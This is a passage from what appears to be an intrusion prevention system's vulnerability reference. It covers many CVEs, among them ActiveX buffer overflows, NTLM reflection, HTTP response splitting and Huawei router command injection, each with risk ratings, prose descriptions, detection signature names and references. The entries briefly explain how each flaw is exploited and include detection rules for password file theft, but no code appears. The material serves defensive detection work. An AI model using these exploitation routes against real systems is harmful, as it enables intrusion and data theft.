Description: A buffer overflow vulnerability exists in Macrovision InstallShield Update Service ActiveX control implemented in isusweb.dll. The vulnerability is due to a boundary error while processing calls to the DownloadAndExecute method of the said ActiveX control. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious webpage, potentially allowing arbitrary code to be injected and executed in the security context of the currently logged in user.s
Situation: HTTP_Macrovision-InstallShield-Update-Service-Isusweb.dll-Remote-Buffer-Overflow
File-Text_Macrovision-InstallShield-Update-Service-Isusweb.dll-Buffer-Overflow
References:
CVE-2007-6654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6654
BID-27013
http://www.securityfocus.com/bid/27013
OSVDB-39980
http://www.osvdb.org/39980
Back to top

HTTP_Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Microsoft Agent
Risk: High
First detected in: sgpkg-ips-121-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000
Software: Microsoft Agent
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Microsoft Windows Agent application. The flaw is due to wrongly copying an overly large string to a fixed-size stack buffer within the code of the agentdpv.dll Dynamic Link Library. By persuading the target user to open a malicious web page, an attacker may execute arbitrary code on the target system within the privileges of the currently logged-on user.
Situation: HTTP_SS-Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow
File-Text_Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow
References:
CVE-2007-3040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3040
BID-25566
http://www.securityfocus.com/bid/25566
OSVDB-36934
http://www.osvdb.org/36934
MS07-051
http://technet.microsoft.com/security/bulletin/MS07-051
Back to top

HTTP_Microsoft-HTTP-Services-Authentication-Reflection

About this vulnerability: Authentication bypass vulnerability in Microsoft HTTP Services
Risk: Moderate
First detected in: sgpkg-ips-217-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a vulnerability in Microsoft HTTP Services which allows remote attackers to bypass SMB NTLM authentication by tricking the victim into connecting to an attacker-controlled HTTP server. The vulnerability allows a remote attacker to connect to the victims host via SMB with the victims privileges by reflecting the victims NTLM authentication over HTTP back to the victims SMB service.
Situation: Analyzer_HTTP-Services-Authentication-Reflection
HTTP_CSH-NTLM-Authentication-Usage
HTTP_SHS-NTLM-Authentication-Usage
SMB-TCP_CHS-NTLM-Authentication-Usage
References:
CVE-2009-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0550
BID-34439
http://www.securityfocus.com/bid/34439
OSVDB-53619
http://www.osvdb.org/53619
MS09-013
http://technet.microsoft.com/security/bulletin/MS09-013
Back to top

HTTP_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption

About this vulnerability: Microsoft Internet Explorer Marquee Object Handling Memory Corruption
Risk: High
First detected in: sgpkg-ips-217-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Code Injection
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles Marquee objects. Remote attackers can exploit this vulnerability by enticing target users to open a crafted web page. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behavior of the target depends on the intention of the attacker. Any injected code is executed in the security context of the currently logged in user. In an unsuccessful code execution attack, Internet Explorer may terminate abnormally.
Situation: HTTP_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
References:
CVE-2009-0554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0554
BID-34426
http://www.securityfocus.com/bid/34426
MS09-014
http://technet.microsoft.com/security/bulletin/MS09-014
Back to top

HTTP_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption

About this vulnerability: Vulnerability in onunload event handling in Microsoft Internet Explorer
Risk: Low
First detected in: sgpkg-ips-98-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to an unspecified error while handling crafted JavaScript code that uses the onunload event. A remote attacker may exploit the vulnerability to cause a denial of service.
Situation: HTTP_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption
References:
CVE-2007-1094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1094
BID-22678
http://www.securityfocus.com/bid/22678
OSVDB-45248
http://www.osvdb.org/45248
Back to top

HTTP_Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Microsoft SQL Server
Risk: High
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 2005
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Distributed Management Objects component of Microsoft SQL Server. The vulnerability is due to a boundary error while handling an overly large argument passed to a vulnerable method of the Distributed Management Objects library, sqldmo.dll. A remote attacker could exploit the vulnerability by enticing the target user to open a malicious web page. Successful exploitation would cause a buffer overflow condition which may lead to arbitrary code injection and execution in the security context of the currently logged-in user.
Situation: HTTP_SS-Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow
File-Text_Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow
References:
CVE-2007-4814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4814
BID-25594
http://www.securityfocus.com/bid/25594
OSVDB-38399
http://www.osvdb.org/38399
Back to top

HTTP_Microsoft-Visual-Basic-6.0-Project-File-Handling-BOF

About this vulnerability: A buffer overflow vulnerability in Microsoft Visual Basic
Risk: High
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Basic; Microsoft Visual Studio
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Visual Basic. The flaw is due to improper boundary protection when processing .VBP files. An attacker can leverage this vulnerability by enticing the target user to open a crafted .VBP file, potentially causing arbitrary code to be injected and executed in the security context of the current logged in user.
Situation: HTTP_Microsoft-Visual-Basic-6.0-Vbp-Project-File-Handling-BOF
File-TextId_Microsoft-Visual-Basic-6.0-Vbp-Project-File-Handling-BOF
References:
CVE-2007-4776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4776
BID-25629
http://www.securityfocus.com/bid/25629
OSVDB-36936
http://www.osvdb.org/36936
Back to top

HTTP_Microsoft-Visual-Foxpro-Vfp6r.dll-Docmd-ActiveX-Control-Command-Execution

About this vulnerability: A vulnerability in Microsoft Visual FoxPro ActiveX control
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual FoxPro; Microsoft Visual Studio
Type: Malfunction
Description: There exists an access control weakness vulnerability in the way Microsoft Visual FoxPro ActiveX Control handles user supplied data. The vulnerability is a result of insufficient data validation while processing the DoCmd method call from a webpage script. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious webpage, potentially allowing arbitrary code to be executed in the security context of the currently logged-in user.
Situation: HTTP_Microsoft-Visual-Foxpro-Vfp6r.dll-Docmd-ActiveX-Control-Command-Execution
File-Text_Microsoft-Visual-Foxpro-Vfp6r-Docmd-ActiveX-Control-Command-Execution
References:
CVE-2008-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0236
BID-27205
http://www.securityfocus.com/bid/27205
Back to top

HTTP_MS09-036

About this vulnerability: MS09-036
Risk: Low
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: This is not a vulnerability.
Situation: HTTP_CSU-MS09-036
References:
MS09-036
http://technet.microsoft.com/security/bulletin/MS09-036
Back to top

HTTP_Oracle-Bea-WebLogic-IIS-Connector-Jsessionid-Stack-Buffer-Overflow

About this vulnerability: Oracle BEA WebLogic Server JSession Stack Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle BEA WebLogic
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the BEA WebLogic Server IIS connector. The vulnerability is due to a boundary error in the IIS connector. A remote unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests to the target host. In an attack where code injection is successful, the behavior of the target depends on the intended function of the injected code. The injected code in such a case executes in the security context of the IIS service. In an attack where code injection is not successful, the affected process terminates abnormally.
Situation: HTTP_CRL-Oracle-Bea-WebLogic-IIS-Connector-Jsessionid-Stack-Buffer-Overflow
References:
CVE-2008-5457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5457
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

HTTP_Pacific-Poker

About this vulnerability: Pacific Poker
Risk: Low
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Pacific Poker
Type: Misconfiguration
Description: Pacific Poker is a online poker game which may show advertisments. Some organizations may consider the Pacific Poker software unwanted.
Situation: HTTP_CS-Pacific-Poker-Login
Back to top

HTTP_Php-Strip-Tags-Bypass-Vulnerability

About this vulnerability: Poison NULL byte vulnerability in PHP
Risk: High
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Metacharacter Injection
Description: A vulnerability exists in the HTML tag filtering method of PHP. PHP does not properly filter tags containing a null byte, allowing potentially unsafe tags to be passed on to further prosessing. This vulnerability allows an attacker to inject malicious script and use the vulnerable PHP in a cross-site scripting attack.
Situation: HTTP_CSU-Php-Poison-Null-Byte-Strip-Tags-Bypass
References:
CVE-2004-0595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595
BID-10724
http://www.securityfocus.com/bid/10724
Back to top

HTTP_Platrium-Weather-Service

About this vulnerability: Zango Platrium online games and weather software
Risk: Low
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Platrium
Type: Misconfiguration
Description: Platrium is a wearher service that may show desktop advertisements. Some organizations may consider the platrium software unwanted.
Situation: HTTP_CSH-Platrium-Weather-Service-User-Agent
HTTP_CSH-Platrium-Weather-Service-Cookie
Back to top

HTTP_PopCap-Games

About this vulnerability: PopCap Game activity
Risk: Low
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PopCap
Type: Misconfiguration
Description: PopCap games are casual online games and may display advertisments. Some organizations may consider PopCap unwanted.
Situation: HTTP_CSH-PopCap-UserAgent
Back to top

HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166

About this vulnerability: A vulnerability in HTTP protocol stack
Risk: High
First detected in: sgpkg-ips-1347-5242
Last changed: sgpkg-ips-1347-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in HTTP stack of Microsoft Windows. Successful exploitation of this issue can result in remote code execution.
Situation: HTTP_CRH-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166
References:
CVE-2021-31166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31166
ms21-may
http://technet.microsoft.com/security/bulletin/ms21-may
Back to top

HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907

About this vulnerability: A vulnerability in HTTP protocol stack
Risk: High
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1461-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in HTTP stack of Microsoft Windows. Successful exploitation of this issue can result in remote code execution.
Situation: HTTP_CS-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907
HTTP_CRH-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166
HTTP_CRH-Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution
References:
CVE-2022-21907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907
ms22-jan
http://technet.microsoft.com/security/bulletin/ms22-jan
Back to top

HTTP_Request-TRACE-2

About this vulnerability: The HTTP request method TRACE was seen in an HTTP request.
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: The TRACE method is not used by most common WWW browsers or other HTTP clients. The TRACE method is seen when the HTTP request is made with uncommon tools, or with a script running on the client's browser. It is not possible to determine if the the client or server is involved in some form of information gathering attack based on the use of the TRACE method, but it is reasonable to assume so.
Situation: HTTP_CS-HTTP_Request-TRACE-2
Back to top

HTTP_Response_Splitting

About this vulnerability: Multiple Vendor HTTP response splitting vulnerability
Risk: Low
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server; Generic proxy; Generic HTTP client
Type: Malfunction
Description: An attacker may be able to poison a server, proxy, or browser cache, or hijack pages that contain user specific information. This vulnerability can be exploited by injecting variations of CRLF sequences into HTTP response headers that the attacker can control or influence.
Situation: HTTP_CSU-Response-Splitting
References:
BID-9804
http://www.securityfocus.com/bid/9804
Back to top

HTTP_SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow

About this vulnerability: Stack-based buffer overflow vulnerability in SAP AG GUI for Windows
Risk: Moderate
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SAP GUI
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in the SAP GUI EAI WebViewer3D ActiveX control. The vulnerability is due to a boundary error in the implementation of a function exposed by the control. A remote attacker can exploit this vulnerability by enticing the user to open a crafted HTML file. In an attack where code injection is successful, the behavior of the target depends on the intended function of the injected code. The code is executed in the security context of the logged in user. In an attack where code injection is not successful, Internet Explorer terminates abnormally.
Situation: HTTP_SS-SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow
File-Text_SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow
References:
CVE-2007-4475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4475
BID-34310
http://www.securityfocus.com/bid/34310
Back to top

HTTP_SS-Adobe-Flash-ActiveX-Buffer-Overflow

About this vulnerability: Adobe Flash ActiveX Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Flash Player
Type: Buffer Overflow
Description: There is a vulnerability in certain versions of the Adobe ActiveX Flash player. The vulnerability can be exploited by luring the target user to a hostile web server that can trigger and exploit the vulnerability. Successful exploitation leads to remote compromise of the client host, allowing the attacker to install bots or other malware on the client system.
Situation: HTTP_SS-Adobe-Flash-ActiveX-Buffer-Overflow
File-Text_Adobe-Flash-ActiveX-Buffer-Overflow
References:
CVE-2002-0605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0605
BID-4664
http://www.securityfocus.com/bid/4664
OSVDB-5177
http://www.osvdb.org/5177
Back to top

HTTP_SS-Microsoft-Internet-Explorer-CSS-Strings-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a remote code execution vulnerability in Microsoft Internet Explorer. The flaw is caused by improper handling of malformed Cascading Style Sheet (CSS) content. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-CSS-Strings-Parsing-Memory-Corruption
References:
CVE-2007-0943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0943
BID-25288
http://www.securityfocus.com/bid/25288
OSVDB-36397
http://www.osvdb.org/36397
MS07-045
http://technet.microsoft.com/security/bulletin/MS07-045
Back to top

HTTP_Starware

About this vulnerability: Starware toolbar
Risk: Low
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Starware
Type: Misconfiguration
Description: Starware is a toolbar for Internet Explorer and it may show desktop advertisments. Some organizations may consider the starware toolbar unwanted.
Situation: HTTP_CSU-Starware-Toolbar-Update
Back to top

HTTP_Sun-Java-Web-Start-Jnlp-File-Argument-Injection

About this vulnerability: A vulnerability in Sun Microsystems JRE
Risk: Moderate
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Runtime Environment
Type: Input Validation
Description: There is a vulnerability in the way Sun Java Web Start isolates Java applications from the host system. A Java Web Start configuration file (JNLP) can be crafted to inject command-line arguments into the vulnerable Web Start virtual machine application. An attacker can exploit this vulnerability to bypass security restrictions and perform privileged operations on a target system.
Situation: HTTP_Java-Web-Start-Jnlp-File-Argument-Injection
File-TextId_Java-Web-Start-Jnlp-File-Argument-Injection
References:
CVE-2005-0836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0836
BID-12847
http://www.securityfocus.com/bid/12847
Back to top

HTTP_SupportSoft-Products-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in SupportSoft ActiveX control
Risk: High
First detected in: sgpkg-ips-98-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SupportSoft Products; Symantec Norton AntiVirus; Symantec Norton Internet Security; Symantec Norton System Works
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the SupportSoft ActiveX Controls. The flaw is due to the lack of proper boundary checks on the user-supplied data to the vulnerable ActiveX control ScriptRunner. Successful exploitation of this vulnerability can allow for arbitrary code execution within the security context of the currently logged in user.
Situation: HTTP_SS-SupportSoft-Products-ActiveX-Control-Buffer-Overflow
File-Text_SupportSoft-Products-ActiveX-Control-Buffer-Overflow
References:
CVE-2006-6490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6490
BID-22564
http://www.securityfocus.com/bid/22564
OSVDB-33482
http://www.osvdb.org/33482
OSVDB-33481
http://www.osvdb.org/33481
Back to top

HTTP_System-File-Access

About this vulnerability: System file access
Risk: Moderate
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-1639-5242
Platform: Any Operating System
Software: <os>
Type: Malfunction
Description: Operating systems and server applications contain files that may provide sensible information to attackers. If an attacker gets these files, it may allow the attacker to launch further attacks possibly leading into a system compromise. Usually these sensible system files are not available or shared by defualt, but a disclosure type of attack is required.
Situation: Shared_CS-System-Password-File-Transfer
Shared_SS-System-Password-File-Transfer
Shared-UDP_System-Password-File-Transfer
HTTP_CSU-Potential-System-File-Disclosure
HTTP_CSU-Suspected-System-File-Disclosure
HTTP_CSU-System-File-Disclosure
Back to top

HTTP_Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Trend Micro OfficeScan Corporate Edition
Risk: High
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trend Micro OfficeScan Corporate Edition
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Trend Micro OfficeScan Client ActiveX control. The flaw is due to a lack of proper boundary checks on the user-supplied data to the vulnerable ActiveX control, OfficeScanSetupINICtrl. Successful exploitation of this vulnerability can allow arbitrary code execution within the security context of the currently logged in user.
Situation: HTTP_SS-Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow
File-Text_Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-0325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0325
BID-22585
http://www.securityfocus.com/bid/22585
OSVDB-33040
http://www.osvdb.org/33040
Back to top

HTTP_Wholesale-Directory-Toolbar

About this vulnerability: Wholesale Directory Toolbar
Risk: Low
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Wholesale Directory Toolbar
Type: Misconfiguration
Description: Wholesale Directory Toolbar is a toolbar for internet explorer. It may report browsing habits to third parties. Some organizations may consider the Wholesale Directory Toolbar software unwanted.
Situation: HTTP_CSH-Wholesale-Directory-Toolbar
Back to top

HTTP_Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Yahoo! Music Jukebox
Risk: High
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Yahoo! Music Jukebox
Type: Buffer Overflow
Description: Multiple buffer overflow vulnerabilities exist in Yahoo! Music Jukebox. These vulnerabilities are caused due to boundary errors within the Yahoo! Music Jukebox ActiveX Control. A remote attack can exploit these vulnerabilities by enticing the target user to open a crafted webpage, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow
File-Text_Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow
References:
CVE-2008-0625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0625
BID-27578
http://www.securityfocus.com/bid/27578
Back to top

HTTP_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow

About this vulnerability: ActiveX Control buffer overflow in Yahoo! Toolbar
Risk: High
First detected in: sgpkg-ips-137-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Yahoo! Toolbar; Yahoo! Widgets; Yahoo Messenger
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Yahoo! Toolbar. The vulnerability is caused due to boundary errors within the YShortcut ActiveX control component of Yahoo! Toolbar. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted webpage, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow
File-Text_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-6535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6535
BID-26956
http://www.securityfocus.com/bid/26956
Back to top

HTTP_Zango-Toolbar

About this vulnerability: Zango Toolbar
Risk: Low
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Zango
Type: Misconfiguration
Description: Zango is a toolbar and weather service that may show advertisements. Some organizations may consider the zango software unwanted.
Situation: HTTP_CSH-Zango-Toolbar
Back to top

Huawei-HG532n-Command-Injection

About this vulnerability: A Huawei HG532n Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-1014-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Huawei HG532n Routers
Type: Insecure Configuration
Description: A vulnerability in Huawei HG532n Routers which allows remote attackers to gain a root shell through command injection.
Situation: HTTP_CRL-Huawei-HG532n-Command-Injection
Back to top

Huawei-HG866-Authentication-Bypass

About this vulnerability: A vulnerability in Huawei HG866 routers
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Huawei HG866 routers
Type: Malfunction
Description: There is an authentication bypass vulnerability in Huawei HG866 routers wihch allows remote attackers to change the web interface administrator password wihtout authentication.
Situation: HTTP_CRL-Huawei-HG866-Authentication-Bypass
Back to top

Huawei-Router-HG532-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in Huawei router HG532
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Huawei router HG532 detected.
Situation: HTTP_CRL-Huawei-Router-HG532-Arbitrary-Command-Execution
References:
CVE-2017-17215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215
Back to top

Huawei-SOHO-Router-Information-Disclosure

About this vulnerability: A Huawei SOHO Router Information Disclosure vulnerability
Risk: High
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Huawei SOHO Router
Type: Insecure Configuration
Description: A vulnerability in Huawei SOHO Router which allows remote attackers to access api pages without authentication allowing them to change configurations and gather information.
Situation: HTTP_CSU-Huawei-SOHO-Router-Information-Disclosure
References:
CVE-2013-6031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6031
Back to top

Hulu-Online-Video-Service

About this vulnerability: Hulu Video service
Risk: Low
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Hulu
Type: Browser
Description: Hulu is an online video service that streams tv-series, movies and clips via web browser.
Situation: HTTP_CSH-Hulu-Access
Back to top

Hummingbird-Inetd-Lpd-Component-Buffer-Overflow

About this vulnerability: A vulnerability in Hummingbird InetD
Risk: High
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Hummingbird Connectivity
Type: Malfunction
Description: A buffer overflow vulnerability exists in the LPD component of the Hummingbird InetD product. The issue is caused by improper processing of incoming TCP stream. Successful exploitation of this vulnerability can allow for arbitrary code to be executed on the target system with System level privileges. In a simple attack case aimed at creating a denial of service condition, the LPD child process serving the attack connection terminates. The terminated daemon constitutes an active connection to InetD. Since InetD controls the number of concurrent connections to the vulnerable LPD service, the service will become inaccessible after such number of attacks as is configured as the maximum concurrent connections. InetD at that point will stop accepting new LPD connection requests. The administrator must either reload the LPD service in the InetD management tool or restart the InetD process to resume the LPD service. Note that other InetD services are not affected by attacks against the LPD service. In a more sophisticated attack scenario, where a malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the InetD service process, normally System.
Situation: Printer_CS-Hummingbird-Inetd-Lpd-Component-Buffer-Overflow
References:
CVE-2005-1815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1815
BID-13788
http://www.securityfocus.com/bid/13788
Back to top

HuntBar

About this vulnerability: HuntBar browser plugin
Risk: Low
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HuntBar
Type: Misconfiguration
Description: HuntBar is an internet explorer plugin and is considered unwanted software by some organizations. It sends browsing information to TrafficSyndicate and may use considerable amounts of available computing resources.
Situation: HTTP_CSH-HuntBar-Download
HTTP_CS-HuntBar-SiteReview
Back to top

Husdawg-System-Requirements-Lab-ActiveX-Unsafe-Method

About this vulnerability: A Husdawg System Requirements Lab ActiveX Unsafe Method vulnerability
Risk: High
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Husdawg System Requirements Lab
Type: Malfunction
Description: A vulnerability in Husdawg System Requirements Lab, version 3, which allows remote attackers to force the execution of arbitrary code by specifying a malicious argument to the Init method in a certain ActiveX control.
Situation: File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
References:
CVE-2008-4385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4385
BID-31752
http://www.securityfocus.com/bid/31752
OSVDB-50122
http://www.osvdb.org/50122
Back to top

Hylafaxplus-LDAP-Authentication-User-Name-Buffer-Overflow

About this vulnerability: A vulnerability in HylaFax+ HylaFAX+
Risk: Moderate
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Hylafax
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HylaFAX+. The vulnerability is due to a buffer overflow when an overly long username is used for LDAP authentication. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious username to target server. Successful exploitation could allow arbitrary code execution within security context of the target server.
Situation: Generic_CS-Hylafaxplus-LDAP-Authentication-User-Name-Buffer-Overflow
References:
CVE-2013-5680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5680
Back to top

Hyleos-ChemView-Buffer-Overflow

About this vulnerability: A Hyleos ChemView Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Hyleos ChemView
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Hyleos ChemView, version 1.9.5.1, which allows remote attackers to execute arbitrary code via a large number of white space characters in the filename argument to the SaveasMolFile and ReadMolFile methods.
Situation: File-Text_Hyleos-ChemView-Buffer-Overflow
References:
CVE-2010-0679
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0679
OSVDB-62276
http://www.osvdb.org/62276
Back to top

IA-Webmail-Server-HTTP-Get-Request-BOF

About this vulnerability: Buffer overflow in IA WebMail Server
Risk: High
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: True North Software IA WebMail Server
Type: Buffer Overflow
Description: IA WebMail Server versions 3.1 and 3.0 are vulnerable to a buffer overflow. A remote attacker can send a long HTTP GET request to overflow a buffer and execute arbitrary code on the system.
References:
CVE-2003-1192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1192
BID-8965
http://www.securityfocus.com/bid/8965
OSVDB-2757
http://www.osvdb.org/2757
Back to top

IAS-MS-CHAP-V2-Authentication-Bypass

About this vulnerability: A vulnerability in Internet Authentication Service (IAS)
Risk: High
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IAS
Type: Malfunction
Description: There exists a vulnerability in how the MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) confirms authentication in the Internet Authentication Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold.
Situation: Generic_UDP-IAS-MS-CHAP-V2-Authentication-Bypass
References:
CVE-2009-3677
